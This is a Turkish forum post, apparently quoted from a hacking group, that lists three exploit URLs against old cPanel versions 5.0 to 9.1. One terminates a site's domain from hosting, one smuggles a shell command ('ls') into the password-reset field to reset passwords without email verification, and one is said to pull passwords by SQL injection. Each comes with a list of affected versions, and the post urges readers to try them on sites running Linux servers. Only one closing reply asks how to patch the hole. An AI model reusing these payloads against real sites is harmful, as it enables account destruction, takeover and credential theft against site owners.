Eger bir sitede cpanel yönetim arayüzü tespit ederseniz bu adresle hostingten domaini silersiniz.
Kod:
http://www.siteadi.com:2086/scripts...?domain=(domain) &user=(user)&submit-domain=Terminate
Uygun sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1 .0-R85
cPanel cPanel 9.1
---------------------
Cpanel sifresini email dogrulamasi gerektirmeden direk sifirlar.
http://www.siteadi.com:2082/resetpass/?user=|">ls"|
Uygun Sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1
----------------------------
Bir sistemde cpanel sql injection ile sifreleri alabilirsiniz:
http://www.siteadi.com:2086/scripts/passwd?password=<> &domain=<>&user=<>
Uygun Sürümler:
cPanel cPanel 5.0
cPanel cPanel 5.3
cPanel cPanel 6.0
cPanel cPanel 6.2
cPanel cPanel 6.4
cPanel cPanel 6.4.1
cPanel cPanel 6.4.2 .STABLE_48
cPanel cPanel 6.4.2
cPanel cPanel 7.0
cPanel cPanel 8.0
cPanel cPanel 9.0
cPanel cPanel 9.1 .0-R85
cPanel cPanel 9.1
CPanel kullanilan sitelerde oluyor bu açik;
Simdi diyeceksin Bir sitenin kontrol panelinin Cpanel oldugunu nereden anlarim,
Söyliyim,Bir sitenin Kontrol paneli ya Plesk Panel dir yada Cpanel panel,
bunu sen anlayamassin ama genelde web mastarlarin tercihi Cpaneldir,Kolay oldugu için tabi
Genelde Linux serverde kurulu oluyor.Yani Linux server kullanan siteler üzerinde deneyin.
Alıntı:Siber Warrior
------------------
Böle bişi varsa nasıl bu açığı kapatabiliriz